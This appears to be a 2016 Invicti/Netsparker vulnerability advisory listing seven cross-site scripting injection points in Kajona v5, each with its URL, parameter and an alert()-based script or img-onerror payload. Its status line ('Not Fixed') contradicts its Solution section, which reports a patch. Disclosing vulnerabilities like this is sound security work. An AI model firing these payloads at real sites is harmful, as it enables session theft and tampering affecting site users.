Multiple Cross-site Scripting Vulnerabilities Identified in Kajona v5

Information

Advisory by Netsparker (now Invicti)
Name: Multiple XSS Vulnerabilities in Kajona v5
Affected Software: Kajona v5
Affected Versions: v5 and possibly below
Vendor Homepage: https://www.kajona.de/ 
Vulnerability Type: Cross-site Scripting
Severity: Important
Status: Not Fixed
Invicti Advisory Reference: NS-16-011

Technical Details

Proof of Concept URLs for XSS vulnerabilities in Kajona v5:

URL: /kajona/index.php?page=eventmanager&systemid=2b8fb44577abc1544ef2&action=saveRegisterForEvent
Parameter Name: comment
Parameter Type: POST
Attack Pattern: </title></textarea><scRipt>alert(9)</scRipt>

URL: /kajona/index.php?page=downloads&systemid="><iMg src=N onerror=alert(9)>&action=mediaFolder
Proof URL: /kajona/index.php?page=downloads&systemid="><iMg src=N onerror=alert(9)>&action=mediaFolder
Parameter Name: systemid
Parameter Type: GET
Attack Pattern: "><iMg src=N onerror=alert(9)>

URL: /kajona/index.php?page=eventmanager&systemid=2b8fb44577abc1544ef2&action=saveRegisterForEvent
Parameter Name: forename
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x004430)</scRipt>

URL: /kajona/index.php?page=eventmanager&systemid=2b8fb44577abc1544ef2&action=saveRegisterForEvent
Parameter Name: email
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x004434)</scRipt>

URL: /kajona/index.php?page=eventmanager&systemid=2b8fb44577abc1544ef2&action=saveRegisterForEvent
Parameter Name: phone
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x004436)</scRipt>

URL: /kajona/index.php?page=votings&action=submitVoting
Parameter Name: systemid
Parameter Type: POST
Attack Pattern: "><iMg src=N onerror=alert(9)>

URL: /kajona/index.php?page=eventmanager&systemid=2b8fb44577abc1544ef2&action=saveRegisterForEvent
Parameter Name: lastname
Parameter Type: POST
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x004432)</scRipt>

For more information on cross-site scripting vulnerabilities, see Cross-site Scripting (XSS).

Advisory Timeline

01 Aug 2016 – First Contact
05 Aug 2016 – Vendor Replied
09 Aug 2016 – Advisory Released

Solution

Patch released by Kajona and announced here.

Credits & Authors

These issues have been discovered by Alperen Yilmaz while testing Invicti Web Application Security Scanner.

About Invicti

Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.